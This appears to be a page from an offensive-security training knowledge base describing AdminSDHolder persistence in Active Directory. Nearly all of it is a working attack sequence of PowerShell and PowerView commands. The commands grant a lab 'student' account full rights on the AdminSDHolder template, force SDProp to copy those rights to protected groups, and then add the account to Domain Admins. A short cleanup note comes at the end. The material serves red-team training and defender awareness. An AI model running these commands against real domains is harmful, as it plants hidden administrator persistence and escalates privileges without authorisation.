Operator On The Wire
← Back to Knowledge Base
OOTW / Chapter IV - Active Directory / 04. Techniques / Persistence / Techniques

AdminSDHolder

AdminSDHolder persistence modifies the ACL template applied to protected administrative objects. SDProp periodically copies the AdminSDHolder security descriptor to protected users and groups, so an ACE placed there can reappear on Domain Admins, Enterprise Admins, and other protected objects.

Protected object check

Get-ADUser -LDAPFilter "(adminCount=1)" -Properties adminCount | Select-Object SamAccountName,adminCount
Get-ADGroup -LDAPFilter "(adminCount=1)" -Properties adminCount | Select-Object SamAccountName,adminCount

Review AdminSDHolder ACL

Get-ACL "AD:\CN=AdminSDHolder,CN=System,DC=ootw,DC=local" |
  Select-Object -ExpandProperty Access |
  Select-Object IdentityReference,ActiveDirectoryRights,ObjectType,IsInherited

Add persistence ACE with PowerView

Import-Module .\PowerView.ps1
Add-DomainObjectAcl -TargetIdentity "CN=AdminSDHolder,CN=System,DC=ootw,DC=local" -PrincipalIdentity student -Rights All -Verbose

Trigger SDProp (Invoke-SDPropagator)

Invoke-SDPropagator -TimeoutMinutes 1 -ShowProgress -Verbose

Validate on protected group

Get-ACL "AD:\CN=Domain Admins,CN=Users,DC=ootw,DC=local" |
  Select-Object -ExpandProperty Access |
  Where-Object {$_.IdentityReference -match "student"}

Abuse the propagated rights

Add-DomainGroupMember -Identity "Domain Admins" -Members student -Verbose

Notes

  • AdminSDHolder is not a normal one-object ACL change.
  • It is a template that can reapply attacker rights to protected admin objects.
  • Cleanup must fix AdminSDHolder and the protected objects that already received the ACE.